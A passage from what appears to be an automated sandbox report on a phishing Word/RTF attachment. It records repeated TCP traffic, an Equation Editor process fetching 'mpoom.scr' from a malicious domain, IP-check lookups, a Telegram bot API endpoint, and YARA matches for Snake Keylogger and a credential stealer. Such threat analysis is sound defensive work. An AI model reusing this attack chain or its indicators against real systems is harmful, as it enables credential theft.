          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162

          Networking

          barindex
          Source: Yara matchFile source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrDNS query: name: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET /mpoom.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dukeenergyltd.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46F363FE-A7DD-406F-B1C8-7F7D7988C666}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /mpoom.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dukeenergyltd.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownDNS traffic detected: queries for: dukeenergyltd.top
          Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610871385.0000000002609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610780471.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.user
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000035D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dukeenergyltd.top/
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dukeenergyltd.top/mpoom.scr
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dukeenergyltd.top/mpoom.scrj
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dukeenergyltd.top/mpoom.scrjjC:
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dukeenergyltd.top/mpoom.scrsoC:
          Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
          Source: unknownHTTPS traffic detected: 172.67.134.136:443 -> 192.168.2.22:49161 version: TLS 1.2

          System Summary

          barindex
          Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3253190.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 5.2.mpoom39002.scr.5f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
